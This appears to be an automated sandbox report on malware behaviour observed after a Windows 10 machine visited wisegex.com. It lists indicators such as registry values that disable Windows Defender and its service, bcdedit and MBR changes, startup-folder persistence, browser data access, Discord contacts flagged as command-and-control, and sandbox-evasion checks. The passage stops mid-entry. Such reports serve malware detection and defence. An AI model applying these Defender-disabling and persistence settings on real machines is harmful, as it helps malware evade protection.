Analysis
-
max time kernel
1008s -
max time network
1010s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
25-05-2024 12:25
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://wisegex.com
Resource
win10v2004-20240508-en
General
-
Target
http://wisegex.com
Malware Config
Signatures
-
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe -
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 3888 bcdedit.exe 3260 bcdedit.exe 4872 bcdedit.exe 1652 bcdedit.exe -
Nirsoft 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\s.exe Nirsoft -
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exepowershell.exeflow pid process 414 4196 mshta.exe 416 4196 mshta.exe 418 4196 mshta.exe 517 2080 powershell.exe 592 2292 powershell.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.execmd.exeWScript.exeWScript.exeWScript.execmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 4 IoCs
Processes:
attrib.execscript.exeattrib.execscript.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\992672351865417544.lnk attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7540126521735912913.lnk cscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7540126521735912913.lnk attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\992672351865417544.lnk cscript.exe -
Executes dropped EXE 64 IoCs
Processes:
System.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exeSystem.exepid process 868 System.exe 5704 System.exe 212 System.exe 4316 System.exe 3292 System.exe 3692 System.exe 4100 System.exe 5020 System.exe 1892 System.exe 6136 System.exe 5000 System.exe 1168 System.exe 3916 System.exe 4924 System.exe 2172 System.exe 3692 System.exe 3472 System.exe 4944 System.exe 5836 System.exe 5356 System.exe 2284 System.exe 5672 System.exe 4376 System.exe 2028 System.exe 3772 System.exe 4316 System.exe 1448 System.exe 2660 System.exe 448 System.exe 4700 System.exe 5684 System.exe 4460 System.exe 4552 System.exe 5584 System.exe 3652 System.exe 5704 System.exe 5732 System.exe 1292 System.exe 3772 System.exe 5220 1292 5356 3180 1684 3772 868 3444 2936 3116 5676 4572 1688 896 5852 2808 5004 3392 5964 5576 1648 5000 5424 1884 4692 -
Loads dropped DLL 8 IoCs
Processes:
MsiExec.exeMsiExec.exeMsiExec.exeWScript.exepid process 4948 MsiExec.exe 4948 MsiExec.exe 6044 MsiExec.exe 6044 MsiExec.exe 5560 MsiExec.exe 3476 3292 WScript.exe 3772 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 3 IoCs
Processes:
MsiExec.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\InprocServer32 MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\InprocServer32\ = "C:\\Program Files\\AESCrypt\\AESCrypt.dll" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\InprocServer32\ThreadingModel = "Apartment" MsiExec.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\System.exe upx behavioral1/memory/868-3146-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/868-3149-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5704-3150-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5704-3154-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/212-3155-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/212-3158-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4316-3159-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4316-3162-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3292-3163-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3292-3167-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3692-3168-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3692-3171-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4100-3172-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4100-3176-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5020-3177-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5020-3181-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/1892-3185-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/6136-3186-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/6136-3189-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5000-3192-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/1168-3196-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3916-3197-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3916-3200-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4924-3201-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4924-3205-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/2172-3208-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3692-3211-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3472-3212-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3472-3216-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4944-3217-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4944-3221-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5836-3222-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5836-3225-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5356-3229-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/2284-3232-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5672-3235-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4376-3238-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/2028-3239-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/2028-3242-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3772-3243-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3772-3247-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4316-3354-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/1448-3358-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/2660-3359-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/2660-3362-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/448-3363-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/448-3367-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4700-3369-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5684-3371-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4460-3383-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4460-3385-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4552-3397-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/4552-3399-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5584-3407-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3652-3416-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5704-3426-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5732-3432-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/5732-3439-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/1292-3446-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/1292-3451-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3772-3459-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/3772-3465-0x0000000000400000-0x0000000000625000-memory.dmp upx behavioral1/memory/1292-3490-0x0000000000400000-0x0000000000625000-memory.dmp upx -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
Processes:
flow ioc 536 discord.com 635 discord.com 686 discord.com 710 discord.com 681 discord.com 707 discord.com 522 discord.com 556 discord.com 615 discord.com 619 discord.com 629 discord.com 665 discord.com 168 camo.githubusercontent.com 550 discord.com 581 discord.com 601 discord.com 660 discord.com 678 discord.com 544 discord.com 572 discord.com 574 discord.com 588 discord.com 593 discord.com 623 discord.com 675 discord.com 683 discord.com 598 discord.com 627 discord.com 657 discord.com 734 discord.com 837 raw.githubusercontent.com 547 discord.com 591 discord.com 666 discord.com 672 discord.com 679 discord.com 731 discord.com 530 discord.com 532 discord.com 551 discord.com 631 camo.githubusercontent.com 663 discord.com 682 discord.com 708 discord.com 613 discord.com 621 discord.com 622 discord.com 728 discord.com 587 discord.com 612 discord.com 626 discord.com 677 discord.com 836 raw.githubusercontent.com 662 discord.com 534 discord.com 571 discord.com 594 discord.com 595 discord.com 600 discord.com 603 discord.com 596 discord.com 630 discord.com 174 camo.githubusercontent.com 543 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 516 api.ipify.org -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
Drops file in System32 directory 11 IoCs
Processes:
description ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx -
Drops file in Program Files directory 3 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Program Files\AESCrypt\AESCrypt.dll msiexec.exe File created C:\Program Files\AESCrypt\aescrypt.exe msiexec.exe File created C:\Program Files\AESCrypt\AESCrypt32.exe msiexec.exe -
Drops file in Windows directory 22 IoCs
Processes:
msiexec.exedescription ioc process File opened for modification C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0\F_CENTRAL_msvcp100_x64.BFF61907_AA2D_3A26_8666_98D956A62ABC msiexec.exe File created C:\Windows\Installer\{562885D3-41A7-4211-822E-B1B1510069E5}\_853F67D554F05449430E7E.exe msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{562885D3-41A7-4211-822E-B1B1510069E5} msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0\F_CENTRAL_msvcr100_x64.BFF61907_AA2D_3A26_8666_98D956A62ABC msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0\F_CENTRAL_atl100_x64.BFF61907_AA2D_3A26_8666_98D956A62ABC msiexec.exe File opened for modification C:\Windows\Installer\e5927f1.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI29B7.tmp msiexec.exe File opened for modification C:\Windows\Installer\{562885D3-41A7-4211-822E-B1B1510069E5}\_853F67D554F05449430E7E.exe msiexec.exe File created C:\Windows\Installer\e5927f3.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI285E.tmp msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0\F_CENTRAL_msvcp100_x64.BFF61907_AA2D_3A26_8666_98D956A62ABC msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0\F_CENTRAL_atl100_x64.BFF61907_AA2D_3A26_8666_98D956A62ABC msiexec.exe File opened for modification C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0 msiexec.exe File created C:\Windows\Installer\$PatchCache$\Managed\3D5882657A14112428E21B1B1500965E\3.10.0\F_CENTRAL_msvcr100_x64.BFF61907_AA2D_3A26_8666_98D956A62ABC msiexec.exe File created C:\Windows\Installer\{562885D3-41A7-4211-822E-B1B1510069E5}\_112D608FD02CD87FDC7735.exe msiexec.exe File opened for modification C:\Windows\Installer\{562885D3-41A7-4211-822E-B1B1510069E5}\_112D608FD02CD87FDC7735.exe msiexec.exe File created C:\Windows\Installer\e5927f1.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI2AE1.tmp msiexec.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vssvc.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000b7d72a8ac39dc2e30000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000b7d72a8a0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900b7d72a8a000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1db7d72a8a000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000b7d72a8a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString -
Delays execution with timeout.exe 64 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 4288 2496 3832 928 2060 timeout.exe 2264 2728 2364 4456 4744 4496 5216 3628 5368 4440 timeout.exe 3252 5032 3708 3824 4256 timeout.exe 5224 timeout.exe 5216 timeout.exe 5044 4936 4692 timeout.exe 2808 3760 3760 timeout.exe 2040 5196 6140 timeout.exe 2924 timeout.exe 2540 4468 5128 812 4976 5684 timeout.exe 3544 timeout.exe 3252 timeout.exe 5196 5856 3900 3288 3668 6096 timeout.exe 5828 3540 3256 2180 1252 4460 timeout.exe 1252 2096 5228 4084 5456 timeout.exe 2088 timeout.exe 6100 408 952 timeout.exe 4520 timeout.exe 1892 timeout.exe 4196 -
Enumerates processes with tasklist 1 TTPs 7 IoCs
Processes:
tasklist.exetasklist.exepid process 5220 2164 3544 tasklist.exe 1532 tasklist.exe 5536 5300 4456 -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exepid process 4924 ipconfig.exe 3832 ipconfig.exe -
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
Processes:
systeminfo.exesysteminfo.exepid process 1748 systeminfo.exe 4256 systeminfo.exe -
Kills process with taskkill 7 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5232 taskkill.exe 4536 taskkill.exe 2164 taskkill.exe 4868 taskkill.exe 1344 2960 5260 -
Modifies data under HKEY_USERS 3 IoCs
Processes:
msiexec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2b msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2A\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a msiexec.exe -
Modifies registry class 59 IoCs
Processes:
msiexec.exeMsiExec.execmd.execmd.exemsedge.execmd.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.aes\Content Type = "application/aes" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\AESCrypt.DLL MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\InprocServer32\ = "C:\\Program Files\\AESCrypt\\AESCrypt.dll" MsiExec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\Version = "50987008" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\ = "AES Crypt Encrypted Data File" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7} MsiExec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell\open\ = "&Open" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.aes\ = "aesfile" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\aesfile msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\aesfile\shell\open msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.aes\aesfile msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\PackageCode = "EF46C65FDB9F863459E25F06C113CF59" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\InstanceType = "0" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{BACE464C-A450-46A7-BC98-F441BCE45CE9} MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{BACE464C-A450-46A7-BC98-F441BCE45CE9}\ = "AESCrypt" MsiExec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{35872D53-3BD4-45FA-8DB5-FFC47D4235E7}\InprocServer32\ThreadingModel = "Apartment" MsiExec.exe Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\3D5882657A14112428E21B1B1500965E\DefaultFeature msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\3D5882657A14112428E21B1B1500965E\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_AESCrypt_v310_x64.zip\\AESCrypt_v310_x64\\" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Local 